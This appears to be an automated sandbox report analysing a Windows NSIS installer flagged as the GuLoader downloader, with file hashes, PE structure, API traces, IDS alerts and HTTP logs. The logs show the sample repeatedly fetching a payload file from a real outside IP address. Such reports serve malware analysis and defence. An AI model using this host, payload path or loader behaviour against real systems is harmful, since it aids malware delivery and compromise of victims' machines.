Entropy (8bit):	3.9637832956585757
Encrypted:	false
SSDEEP:	3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
MD5:	16D513397F3C1F8334E8F3E4FC49828F
SHA1:	4EE15AFCA81CA6A13AF4E38240099B730D6931F0
SHA-256:	D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
SHA-512:	4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
Malicious:	false
Preview:	kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

C:\Users\user\AppData\Local\Temp\nsz77C3.tmp

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.0914493934217315
Encrypted:	false
SSDEEP:	3:sBa99k1NoCFOn:KankVg
MD5:	5D04A35D3950677049C7A0CF17E37125
SHA1:	CAFDD49A953864F83D387774B39B2657A253470F
SHA-256:	A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
SHA-512:	C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
Malicious:	false
Preview:	kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

C:\Users\user\forvredet.lnk

Download File

Process:	C:\Users\user\Desktop\ODjwCjQBAP.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	3.1414415570302276
Encrypted:	false
SSDEEP:	24:8JvaRkD4/BPefDbDLqizZYpbDVPizZeiQ45HALqy:8oRkDsxy/DLqiNwDVPiNlQeAOy
MD5:	15BE100E4D1CD820CBC2EC77393024F4
SHA1:	33082DB8320A42F887FB892D0FEC27AE62AF9B6C
SHA-256:	D3BCE25CA227FB80FAD3D419B127D150DB1ECC99C5A5D0811263ACB1B6EBF054
SHA-512:	5A783F0B728BC36143EB9BC4EBDCB96E5ED20E548E0C8EE78F47BB6F49D2B27A84992F8E2F8C6B6E76551A37B082C7580CF386875854A35B16E078824218459A
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........INetCache.D............................................I.N.e.t.C.a.c.h.e.....n.2...........divergentes.pin.P............................................d.i.v.e.r.g.e.n.t.e.s...p.i.n.......;...\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.d.i.v.e.r.g.e.n.t.e.s...p.i.n.R.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.310486265921839
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ODjwCjQBAP.exe
File size:	1'040'520 bytes
MD5:	2b78431a8969c829339ed0da29004757
SHA1:	c09051c5f433348c6cf5b5c0781af877f44212d2
SHA256:	c10aac838dd326d74fcc69eeae41117036ac26b858285fa0da034cba44762f7a
SHA512:	3530aaad10469254279ffd782e61d4254cb73f5b9c2527f1a4a38f0424d5acb3a860d29b7ed9b4b619a98ab3b20742f0c3705321afb026b4b6e8c57dc052fabf
SSDEEP:	24576:+o8RUr/5+1g8UJT4l8at7kEeTg/ITSZOG+1Mjb2WsQbd38TRAn9:+h+/0S8S0OeXITSI1Mjvsa4i9
TLSH:	5225F1E1B380466AF4790D36848BC2E152F1FD969E021A5723BCF36D2D73290564BDFA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...5.MX.................`.........

File Icon


Icon Hash:	2f6b71f16d4c71b3

Static PE Info

General

Entrypoint:	0x4032bf
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x584DCA35 [Sun Dec 11 21:50:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4f67aeda01a0484282e8c59006b0b352

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Bordroom, O=Bordroom, L=Harwick, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	08/06/2024 02:30:48 08/06/2027 02:30:48
Subject Chain	CN=Bordroom, O=Bordroom, L=Harwick, C=US
Version:	3
Thumbprint MD5:	EA52BE382F8398DA30FBEF403C134581
Thumbprint SHA-1:	630A44123CE84C2B91C3A1C3D058D5EFC79FCD93
Thumbprint SHA-256:	D6AF5D9F936528206E9F16636C16E7286901048F173665CACA233214CBFAFE32
Serial:	2D659AA4E05CD2D4CEAFB2673653B38DCBC537F4

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FA6C06DBAD3h
push ebx
call 00007FA6C06DEA59h
cmp eax, ebx
je 00007FA6C06DBAC9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FA6C06DE9D5h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FA6C06DBAADh
push ebp
push 00000009h
call 00007FA6C06DEA2Ch
push 00000007h
call 00007FA6C06DEA25h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007FA6C06DE64Fh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007FA6C06DE63Dh
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x42ba0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xfcea8	0x11e0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e59	0x6000	1892c55874b94ef60ac62cf77f0ecd0e	False	0.6585693359375	data	6.424194540104456	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	6389f916226544852e494114faf192ad	False	0.4271484375	data	5.0003960999706765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	f02c8b5709d3fb8c6cc1ab777c138d8f	False	0.6455078125	data	5.211928615453691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x23000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x47000	0x42ba0	0x42c00	cb7fd179fd9ca3f4757b01d96679c1b0	False	0.21076559573970038	data	3.8403807556058642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x47208	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.20773293487587655
RT_DIALOG	0x89230	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x89378	0x100	data	English	United States	0.5234375
RT_DIALOG	0x89478	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x89598	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x895f8	0x14	data	English	United States	1.1
RT_VERSION	0x89610	0x24c	data	English	United States	0.5357142857142857
RT_MANIFEST	0x89860	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T17:08:16.529468+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49949	84.38.129.16	80	TCP
2024-12-05T17:09:18.678508+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49747	84.38.129.16	80	TCP
2024-12-05T17:09:40.804027+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49799	84.38.129.16	80	TCP
2024-12-05T17:10:02.944950+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49848	84.38.129.16	80	TCP
2024-12-05T17:10:25.104715+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49898	84.38.129.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 17:08:56.661978960 CET	49747	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:08:56.781816959 CET	80	49747	84.38.129.16	192.168.2.5
Dec 5, 2024 17:08:56.782110929 CET	49747	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:08:56.782413006 CET	49747	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:08:56.903213978 CET	80	49747	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:18.678373098 CET	80	49747	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:18.678508043 CET	49747	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:18.678658009 CET	49747	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:18.798391104 CET	80	49747	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:18.802228928 CET	49799	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:18.922301054 CET	80	49799	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:18.922394991 CET	49799	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:18.922633886 CET	49799	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:19.043062925 CET	80	49799	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:40.803905964 CET	80	49799	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:40.804027081 CET	49799	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:40.804259062 CET	49799	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:40.925664902 CET	80	49799	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:40.931718111 CET	49848	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:41.052402973 CET	80	49848	84.38.129.16	192.168.2.5
Dec 5, 2024 17:09:41.052509069 CET	49848	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:41.052726984 CET	49848	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:09:41.172389030 CET	80	49848	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:02.944827080 CET	80	49848	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:02.944950104 CET	49848	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:02.945092916 CET	49848	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:03.064706087 CET	49898	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:03.064959049 CET	80	49848	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:03.184514999 CET	80	49898	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:03.184644938 CET	49898	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:03.184823036 CET	49898	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:03.306377888 CET	80	49898	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:25.102098942 CET	80	49898	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:25.104715109 CET	49898	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:25.104888916 CET	49898	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:25.218841076 CET	49949	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:25.225172043 CET	80	49898	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:25.338901997 CET	80	49949	84.38.129.16	192.168.2.5
Dec 5, 2024 17:10:25.338996887 CET	49949	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:25.360743999 CET	49949	80	192.168.2.5	84.38.129.16
Dec 5, 2024 17:10:25.480530977 CET	80	49949	84.38.129.16	192.168.2.5

HTTP Request Dependency Graph

84.38.129.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49747	84.38.129.16	80	6180	C:\Users\user\Desktop\ODjwCjQBAP.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:08:56.782413006 CET	175	OUT	GET /uvsMrbCwSaj148.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.129.16 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49799	84.38.129.16	80	6180	C:\Users\user\Desktop\ODjwCjQBAP.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:09:18.922633886 CET	175	OUT	GET /uvsMrbCwSaj148.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.129.16 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49848	84.38.129.16	80	6180	C:\Users\user\Desktop\ODjwCjQBAP.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:09:41.052726984 CET	175	OUT	GET /uvsMrbCwSaj148.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.129.16 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49898	84.38.129.16	80	6180	C:\Users\user\Desktop\ODjwCjQBAP.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:10:03.184823036 CET	175	OUT	GET /uvsMrbCwSaj148.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.129.16 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49949	84.38.129.16	80	6180	C:\Users\user\Desktop\ODjwCjQBAP.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:10:25.360743999 CET	175	OUT	GET /uvsMrbCwSaj148.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.129.16 Cache-Control: no-cache

Target ID:	0
Start time:	11:08:20
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\ODjwCjQBAP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ODjwCjQBAP.exe"
Imagebase:	0x400000
File size:	1'040'520 bytes
MD5 hash:	2B78431A8969C829339ED0DA29004757
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2306343493.0000000005427000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:08:47
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\ODjwCjQBAP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ODjwCjQBAP.exe"
Imagebase:	0x400000
File size:	1'040'520 bytes
MD5 hash:	2B78431A8969C829339ED0DA29004757
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.3304110338.00000000017C7000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.1%
Dynamic/Decrypted Code Coverage:	13.9%
Signature Coverage:	21.3%
Total number of Nodes:	1520
Total number of Limit Nodes:	52

Executed Functions

Function 004032BF Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032E4
GetVersion.KERNEL32 ref: 004032EA
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403313
#17.COMCTL32(00000007,00000009), ref: 00403335
OleInitialize.OLE32(00000000), ref: 0040333C
SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 00403358
GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040336D
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ODjwCjQBAP.exe",00000000), ref: 00403380
CharNextA.USER32(00000000,"C:\Users\user\Desktop\ODjwCjQBAP.exe",00000020), ref: 004033AB
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004034A8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034B9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034C5
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034D9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034E1
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034F2
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034FA
DeleteFileA.KERNELBASE(1033), ref: 0040350E

Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD

OleUninitialize.OLE32(?), ref: 004035BC
ExitProcess.KERNEL32 ref: 004035DD
GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FA
OpenProcessToken.ADVAPI32(00000000), ref: 00403701
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403719
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403738
ExitWindowsEx.USER32(00000002,80040002), ref: 0040375C
ExitProcess.KERNEL32 ref: 0040377F

Part of subcall function 004056ED: MessageBoxIndirectA.USER32(00409230), ref: 00405748

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously, xrefs: 0040348D, 0040358E, 00403638, 00403641
\Temp, xrefs: 004034BF
~nsu, xrefs: 004035E8
Error launching installer, xrefs: 00403574
C:\Users\user\Desktop\ODjwCjQBAP.exe, xrefs: 0040369A
NSIS Error, xrefs: 0040335E
1033, xrefs: 00403509
.tmp, xrefs: 00403604
TEMP, xrefs: 004034ED
UXTHEME, xrefs: 00403307, 0040330C, 00403312
Low, xrefs: 004034DB
C:\Users\user\AppData\Local\Temp\, xrefs: 0040349D, 004034A2, 004034B8, 004034C4, 004034D3, 004034E0, 004034EC, 004034F4, 004035ED, 004035FE, 00403609, 00403615, 00403622, 00403631, 004036E0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme, xrefs: 00403599
SeShutdownPrivilege, xrefs: 00403713
", xrefs: 004033D0
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D3
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 00403373, 00403379, 00403532
TMP, xrefs: 004034F5
C:\Users\user\Desktop, xrefs: 0040360F, 00403614, 00403640

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\ODjwCjQBAP.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ODjwCjQBAP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3329125770-913047964
Opcode ID: e89bfe13b8eb1ba36e43d38e3c68fc4bfbdc91619f963e3beaaf1f3555cbe72f
Instruction ID: 987bc29005933e48b9d04248005189ae3273ffe916fb5a61461eda946c2e522c
Opcode Fuzzy Hash: e89bfe13b8eb1ba36e43d38e3c68fc4bfbdc91619f963e3beaaf1f3555cbe72f
Instruction Fuzzy Hash: FCC109706082816AE7216F259D49A2F3EACEF81706F44447FF481761E2CB7C9A05CB6E

Function 0040524E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004052AD
GetDlgItem.USER32(?,000003EE), ref: 004052BC
GetClientRect.USER32(?,?), ref: 004052F9
GetSystemMetrics.USER32(00000002), ref: 00405300
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405321
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405332
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405345
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405353
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405366
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405388
ShowWindow.USER32(?,00000008), ref: 0040539C
GetDlgItem.USER32(?,000003EC), ref: 004053BD
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053CD
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053E6
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F2
GetDlgItem.USER32(?,000003F8), ref: 004052CB

Part of subcall function 00404111: SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F

GetDlgItem.USER32(?,000003EC), ref: 0040540E
CreateThread.KERNELBASE(00000000,00000000,Function_000051E2,00000000), ref: 0040541C
CloseHandle.KERNELBASE(00000000), ref: 00405423
ShowWindow.USER32(00000000), ref: 00405446
ShowWindow.USER32(?,00000008), ref: 0040544D
ShowWindow.USER32(00000008), ref: 00405493
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054C7
CreatePopupMenu.USER32 ref: 004054D8
